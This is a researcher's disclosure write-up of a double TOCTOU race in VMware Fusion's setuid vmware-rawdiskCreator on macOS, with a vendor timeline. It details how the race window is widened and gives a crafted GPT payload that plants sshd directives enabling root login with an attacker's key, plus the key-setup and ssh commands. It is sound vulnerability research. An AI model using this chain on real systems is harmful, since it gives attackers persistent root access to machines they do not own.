C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS

Introduction

VMware Fusion is one of the most widely deployed virtualization solutions on macOS. It allows users to run virtual machines, manage virtual disk images, and interact with raw physical disks. One of its less known components is a command line utility called vmware-rawdiskCreator, which creates VMDK (Virtual Machine Disk) descriptors from physical disk devices. What makes this binary particularly interesting from a security perspective is that it is installed as SUID (or setuid) root.

During this research, I identified a double TOCTOU (Time of check Time of use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root privileged file creation operations to arbitrary directories on the filesystem.

Combined with a carefully crafted GPT disk image and a creative choice of target directory, this vulnerability achieves persistent Local Privilege Escalation as root.

Reserach environment (vulnerable version <= 25H2u1)

Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.

alt-text

Quick download and installation

You can download VMware Fusion from VMware website (which redirects to Broadcom website).

alt-text

After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation.

alt-text

Then you can launch the tool.

alt-text

Target identification

During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.

alt-text

vmware-rawdiskCreator has the setuid bit enabled. The binary is owned by root (as s bit is set), and starts running with root privileges, regardless of which user launches it.

alt-text

The target could easily have been identified using a tool I developed called MTM, which does local attack surface mapping for macOS. It recursively walks the filesystem, identifies Mach-O binaries, captures file metadata and code-signing entitlement.

alt-text

The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.

alt-text

The create command takes a raw disk device (e.g., /dev/diskXX), a partition number, an output path, and an adapter type. It produces two output files:

<USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
<USER_DEFINED>.vmdk, the VMDK descriptor (a text file).

alt-text

These files are created inside a temporary working directory hierarchy that the binary builds under TMPDIR (if the environment variable is set).

Analysis

The goal of dynamic analysis is to run the binary as expected and observe what happens from a filesystem perspective. For this purpose, we can use fs_usage.

I’m using a custom patched version of fs_usage_ng, which is itself a patched version of fs_usage from Gergely Kalman.

alt-text

Since we can now see which functions and syscalls are called by the binary, we can begin the first stage of reverse engineering to identify how the paths are constructed, determine whether they can be controlled by the user running the binary or not.

alt-text

We must therefore reverse the function sub_10001c9e0().

alt-text

Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.

sub_10001c9e0() starts by taking a process-wide exclusive lock, then calls _geteuid() and uses that as the security identity for the temp directory. It keeps two cached paths, selected by the second argument. If a cached path already exists for the current effective UID, it tries mkdir(path, 0700). If that fails with EEXIST, it runs lstat() and only accepts the directory if all of the following conditions are true:

It is a directory where st_uid == geteuid().
Permissions are reduce to 0700.

st.st_uid, user id of the owner returned by lstat().

If there is no usable cached directory, it searches for a base temp directory. The first argument controls whether it first consults the preference key tmpDirectory (_Preference_GetString()). After that it tries _getenv("TMPDIR"), then hardcoded candidates (including /var/tmp/ and /tmp), then the current working directory via _File_Cwd(), and then one more built-in fallback.

Every candidate is only screened with _FileIsWritableDir().

alt-text

Playing with `getenv()`

As shown, we can control the path of the temporary directory by manipulating the TMPDIR environment variable. Let’s see what happens with fs_usage when this variable is under our control.

alt-text

Binary’s behavior

When invoked using create, the binary performs the following operations (while running with effective UID 0, root privileges):

mkdir TMPDIR/vmware-root/ (mode 0700).
mkdir TMPDIR/vmware-root/rawdiskCreator<pid>/ (mode 0700).
open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (O_CREAT).
write raw MBR + GPT data from the source disk.
open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (O_CREAT).
write VMDK descriptor text.
On error or completion it unlink files and rmdir directories.

When looking at the execution flow, I realized that several properties of this behavior were relevant to perform a TOCTOU attack.

`TMPDIR` environment variable is user-controlled

The binary inherits TMPDIR from the calling process and uses it as the base for its temporary directory hierarchy. On macOS, TMPDIR typically points to a per user directory under /private/var/folders/, but an attacker can set it to any path before invoking the binary.

`O_NOFOLLOW` on source files

While the binary does use O_NOFOLLOW when creating destination files (after dropping privileges for the final VMDK output), it does not use this flag for the intermediate source files created in above steps 3 and 5. This means that if any component of the path is a symlink, the kernel will happily follow it.

The O_NOFOLLOW flag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.

Files are created as `root`

Because the binary’s effective UID is 0 at the time of file creation, the resulting files are owned by root with mode 0600. This is a powerful primitive as we can create root owned files in any directory where root has write access (with the exception of repertoires protected by SIP).

Cleanup on exit

The binary removes its temporary files and directories before exiting. This means that after a successful race, we must freeze the binary (via SIGSTOP) before it can run its cleanup routine, or the planted files will be deleted.

Understanding the TOCTOU vulnerability

The vulnerability is a classic TOCTOU race condition. The binary performs directory creation and file creation as separate, non-atomic operations. Between these operations, an attacker can substitute a directory with a symlink, causing the binary’s subsequent open() calls to follow the symlink to a location of the attacker’s choosing.

The attack consists of two sequential TOCTOU swaps:

alt-text

After both swaps succeed, the path that the binary resolves becomes:

alt-text

The binary creates <USER_DEFINED>-pt.vmdk as root in what it believes is its private temp directory, but the file actually lands in /etc/ssh/sshd_config.d/.

Enlarging your race window

TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.

Path-padding symlink chains

Instead of pointing TMPDIR directly at a temporary directory, we create a chain of 20 symlinks, each stuffed with ./ and d/../ path components.

tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../...     (resolves to tmpdir itself)
tmpdir/d   -> (real directory, needed for "d/../" to resolve)

In XNU, the main pathname resolution function is namei(struct nameidata *ndp). namei() converts a pathname into the resolved vnode/inode, and its comment shows the lookup flow. Choose the starting directory, then repeatedly call lookup on path components. At a lower-level the resolver is lookup(), which is called from inside namei().

We then set TMPDIR to <tmpdir>/s1. When the binary resolves this path, the function namei() must traverse thousands of path components across 20 symlink hops. This wastes tens of microseconds of CPU time in kernel space, dramatically widening the race window.

This technique is inspired by the path padding approach described by Borisov, Johnson, and Dean in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.

It looks very much like USENIX Security 2005, diagram.

alt-text

The total number of symlink hops must stay within macOS’s MAXSYMLINKS (from XNU kernel source bsd/sys/param.h) limit.

alt-text

Our directory structure is as follows:

20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops

Which fit within the 32 hop limit.

CPU pressure

In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.

One pressure thread is spawned per logical CPU. The combination of path padding and CPU pressure makes the race extremely reliable, during my tests, it consistently won within 1 to 2 (while loop) attempts on my host and 25 to 28 (while loop) attempts within a VM.

Stage 1: `RENAME_SWAP` on vmware-root

The first race targets the vmware-root directory. After the binary creates TMPDIR/vmware-root/ as a real directory, we need to replace it with a symlink to our staging directory.

We monitor the temp directory using fstatat(), waiting for vmware-root to appear.

The key operation here is renameatx_np() with the RENAME_SWAP flag. This is a macOS specific system call that atomically swaps two directory entries. We precreate a symlink called .swap_sym pointing to our staging directory, then swap it with vmware-root in a single atomic operation.

renameatx_np(2) with RENAME_SWAP performs an atomic exchange of two filesystem entries. This is strictly better than a non-atomic rename + symlink sequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.

If RENAME_SWAP fails (for example, if the temp directory and the swap target are on different filesystems), we fall back to a non-atomic rename + symlink sequence.

After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.

Stage 2: `rmdir` + `symlink` on rawdiskCreator<pid>/

After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.

The process is similar to Stage 1, but we use rmdir() + symlink() instead of RENAME_SWAP, because the directory to be replaced is freshly created and empty.

Before resuming the binary, we set up a kqueue watch on the target directory using EVFILT_VNODE with NOTE_WRITE. This mechanism allows us to be notified the instant a new file appears in the target directory.

kqueue(2) is the macOS kernel event notification interface. EVFILT_VNODE with NOTE_WRITE fires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling with readdir(), allowing us to freeze the binary almost immediately after it creates the first file.

When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:

alt-text

The kqueue fires, and we immediately SIGSTOP the binary again. This is critical as the binary creates <USER_DEFINED>-pt.vmdk first, then <USER_DEFINED>.vmdk. By freezing it after the first file is created, but before the second, we ensure that only <USER_DEFINED>-pt.vmdk lands in the target directory.

Crafting the payload

The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.

MBR boot code

According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.

On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.

alt-text

Building a valid GPT image

We cannot simply dump arbitrary data into a file and pass it to the binary. The vmware-rawdiskCreator binary validates that the source disk contains a valid GPT partition table with at least one partition. We must construct a compliant GPT image.

Our image builder creates a minimal 10Mb disk image with:

A protective MBR with our payload in the boot code area.
A primary GPT header (sector 1) with valid checksums.
A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
A backup GPT header and entry array at the end of the image.

The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for partition mode operation. The image is then attached as a virtual disk device using hdiutil.

Command:

hdiutil attach -nomount payload.img

Output:

/dev/diskXX          GUID_partition_scheme
/dev/diskXXs1        Apple_HFS

This /dev/diskXX device is passed to vmware-rawdiskCreator as the source disk.

Eliminating newline (`0x0A`) bytes from GPT structures

For reasons that will become clear in the next section, the planted -pt.vmdk file must be parseable as a valid sshd configuration file. The configuration format we target uses # to denote comments. Our strategy is as follow:

The payload (first 440 bytes) contains valid configuration directives, and end with \n#.
The # at the end of the payload makes everything that follows a comment.
If there are no more 0x0A (newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.

Most GPT fields are naturally free of 0x0A.

The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).

Partition unique GUID (16 bytes)

This is a random identifier for the partition. We iterate through candidate values, computing the CRC32 of the full 128 entry partition array for each, until we find one where the resulting CRC contains no 0x0A byte. Each candidate byte is deterministically derived and clamped away from 0x0A.

Disk GUID (16 bytes)

This identifies the disk itself. We iterate similarly, but this time we must satisfy two constraints simultaneously. The primary header CRC and the backup header CRC must both be free of 0x0A. The two headers have different LBA values (the backup header’s myLBA and alternateLBA are swapped), so their CRCs differ.

In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a final scan verifies that zero 0x0A bytes remain anywhere in the GPT structures.

Finding the right target or why sudoers.d fails and sshd_config.d works

The exploit gives us the ability to create a root owned file in any directory (excluding those protected by SIP). The planted file is always named <USER_DEFINED>-pt.vmdk (derived from the output basename and the -pt.vmdk suffix hardcoded in the binary). The key question is, “Where should we plant this file to achieve privilege escalation?”.

sudoers.d dead end

The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:

File: /etc/sudoers

...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d

Despite the # prefix, this is not a comment. The #includedir directive tells sudo to read all configuration files from the specified directory. If we could plant a file containing %staff ALL=(ALL) NOPASSWD: ALL in /etc/sudoers.d/, any member of the staff group (which includes all local users on macOS) would gain passwordless sudo access.

However, sudo applies a filename filter to files read via #includedir. From the sudoers(5) manual page. When sudoreads the sudoers file via #includedir, it will skip any files that end in ~ or contain a ..

alt-text

Our file suffix is -pt.vmdk. It contains ., so, sudo will unconditionally skip it.

Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.

I explored several workarounds:

LaunchDaemons: /Library/LaunchDaemons/ requires .plist extension. launchctl load returns “Input/output error” for .vmdk files.
Periodic scripts: periodic(8) checks executability. Our file has mode 0600 (no execute bit), and we cannot chmod it.
PAM: /etc/pam.d/ requires files named after the service (e.g., sudo, login). A file named -pt.vmdk does not match any service.
cron.d: Does not exist by default on macOS.
paths.d: path_helper runs as the calling user, which cannot read our 0600 file. And even when readable, paths.d entries are appended (not prepended) to PATH, preventing command shadowing.

The sshd_config.d breakthrough

After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains:

alt-text

This is a critical difference from sudo’s #includedir. OpenSSH’s Include directive uses standard glob(3) pattern matching. The pattern * matches all non hidden files regardless of their extension or the presence of dots in their filename. Our -pt.vmdk file matches this glob and will be included.

The distinction is subtle but critical. sudo’s #includedir applies a custom filename filter (rejecting files with .), while OpenSSH’s Include uses the system’s glob(3) function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.

Furthermore, the Include directive appears at the top of sshd_config, before all other options. Since OpenSSH uses first match wins semantics, our directives take precedence. sshd_config uses # for comments, just like sudoers. Our \n# trick works identically. sshd runs as root and can read the 0600 file.

I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:

alt-text

None of these options overlap with our payload, as our payload consists of:

PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#

When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:

Line 1: PermitRootLogin yes                     (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k  (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root          (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data>             (comment with no newlines to EOF)

Each directive serves a specific purpose:

PermitRootLogin yes, allows SSH login as the root user.
AuthorizedKeysCommand /bin/cat /tmp/.k, tells sshd to execute /bin/cat /tmp/.k to obtain authorized public keys for any connecting user. The /bin/cat binary satisfies sshd’s requirement as the command is owned by root and not writable by group or others. This approach is additive. It does not override AuthorizedKeysFile, so existing SSH authentication for other users remains unaffected.
AuthorizedKeysCommandUser root, specifies that the command should run as root.

The file /tmp/.k need to be created before running the exploit as it will craft our Ed25519 public key. But first, I verified that sshd accepts this configuration by running sshd in test mode.

Command:

/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'

Output:

permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root

All three directives are active, and sshd exits with code 0, confirming that the binary GPT data after # is correctly treated as a comment.

Exploitation and proof of concept

Prerequisites

The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).

Creation of cryptographic keys

Before running, we prepare the SSH keys that will be used for root authentication:

ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k

Compiling the exploit

cc -O2 -lpthread -o exploit exploit.c

Running the exploit

File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)

/*
 *                         /\  .-----.  /\
 *                        //\\/       \//\\
 *                        |/\|    0    |/\|
 *                        //\\\;-----;///\\
 *                       //  \/   .   \/  \\
 *                      (| ,-_|coiffeur|_-, |)
 *                        //`__\.-.-./__`\\
 *                       // /.-(     )-.\ \\
 *                      (\ |)   '   '   (| /)
 *                       ` (|           |) `
 *                         \)           (/
 * Title:   VMware Fusion TOCTOU LPE as root (macOS)
 * Author:  Mathieu Farrell aka @Coiffeur0x90
 * Summary: Exploits a double TOCTOU race condition in the suid root binary
 *          vmware-rawdiskCreator to write an attacker controlled, root owned
 *          file into /etc/ssh/sshd_config.d/. The planted file configures
 *          sshd to accept root SSH login using a attacker supplied public key,
 *          achieving persistent local privilege escalation.
...

alt-text

Gaining root access

Once sshd is running (if Remote Login is enabled, or after the next reboot on systems where it is enabled), the attacker can SSH in as root:

ssh -i /tmp/.kp root@localhost

The planted configuration causes sshd to run /bin/cat /tmp/.k as the AuthorizedKeysCommand, which returns the attacker’s public key. SSH public key authentication succeeds, and the attacker obtains a root shell.

Persistence

The planted file survives reboots. It will be included by sshd on every startup via the Include /etc/ssh/sshd_config.d/* directive. The attacker maintains root SSH access as long as the file remains in /etc/ssh/sshd_config.d/ and the key file exists at /tmp/.k.

The <USER_DEFINED>.vmdk problem

It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:

<USER_DEFINED>-pt.vmdk, the partition table (our payload).
<USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).

If <USER_DEFINED>.vmdk is also created in /etc/ssh/sshd_config.d/, it will be included by sshd’s glob and parsed. This file begins with # Disk DescriptorFile (a comment), but subsequent lines like version=1 are not valid sshd_config keywords. sshd might treats unknown keywords as fatal errors and refuses to start.

This is why the kqueue-based freeze mechanism in Stage 2 is critical. By detecting the first file creation (the NOTE_WRITE event on the target directory) and immediately sending SIGSTOP, we freeze the binary after <USER_DEFINED>-pt.vmdk is created but before <USER_DEFINED>.vmdk is written. In all of my test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.

Conclusion

This research demonstrates how a TOCTOU race condition in a setuid binary can be escalated to full root access on macOS. The key ingredients of this recipe were:

A SUID root binary that follows symlinks when creating files in a user-controlled directory hierarchy.
Path-padding symlink chains to widen the race window to a reliably winnable size.
An atomic directory swap (RENAME_SWAP) for the first race, and a kqueue-triggered freeze for precise timing control.
A crafted GPT disk image with all 0x0A bytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers.
The subtle difference between sudo’s #includedir (which filters filenames containing .) and OpenSSH’s Include (which uses unrestricted glob(3) matching), making sshd_config.d a viable target.

Thanks for taking the time to read this article.

Timeline

2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
2026 April 12: First email sent to security@vmware.com.
2026 April 12: Second email sent to vmware.psirt@broadcom.com.
2026 April 12: Start of the investigation by VMware team.
2026 April 25: Vulnerability confirmed by VMware team.
2026 April 25: I Declined to join the private Bung Bounty program and therefore declined to sign the associated NDA.
2026 April 29: VMware has informed me that the process now qualifies as a public disclosure and that they will keep me updated on the rest of the process.
2026 May 11: VMware has informed me that the advisory will be published.
2026 May 14: The advisory has been published as VMSA-2026-0003/CVE-2026-41702.

Introduction

Reserach environment (vulnerable version <= 25H2u1)

Quick download and installation

Target identification

Analysis

Playing with getenv()

Binary’s behavior

TMPDIR environment variable is user-controlled

O_NOFOLLOW on source files

Files are created as root

Cleanup on exit

Understanding the TOCTOU vulnerability

Enlarging your race window

Path-padding symlink chains

CPU pressure

Stage 1: RENAME_SWAP on vmware-root

Stage 2: rmdir + symlink on rawdiskCreator<pid>/

Crafting the payload

MBR boot code

Building a valid GPT image

Eliminating newline (0x0A) bytes from GPT structures

Partition unique GUID (16 bytes)

Disk GUID (16 bytes)

Finding the right target or why sudoers.d fails and sshd_config.d works

sudoers.d dead end

The sshd_config.d breakthrough

Exploitation and proof of concept

Prerequisites

Creation of cryptographic keys

Compiling the exploit

Running the exploit

Gaining root access

Persistence

The <USER_DEFINED>.vmdk problem

Conclusion

Timeline

Playing with `getenv()`

`TMPDIR` environment variable is user-controlled

`O_NOFOLLOW` on source files

Files are created as `root`

Stage 1: `RENAME_SWAP` on vmware-root

Stage 2: `rmdir` + `symlink` on rawdiskCreator<pid>/

Eliminating newline (`0x0A`) bytes from GPT structures